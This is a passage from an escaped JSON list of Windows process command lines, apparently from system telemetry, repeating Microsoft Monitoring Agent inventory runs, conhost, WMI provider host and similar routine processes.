2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MOMPerfSnapshotHelper.exe\\\" -Embedding\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MOMPerfSnapshotHelper.exe\\\" -Embedding\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MOMPerfSnapshotHelper.exe\\\" -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MOMPerfSnapshotHelper.exe\\\" -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\System32\\\\InstallAgent.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\System32\\\\InstallAgent.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe 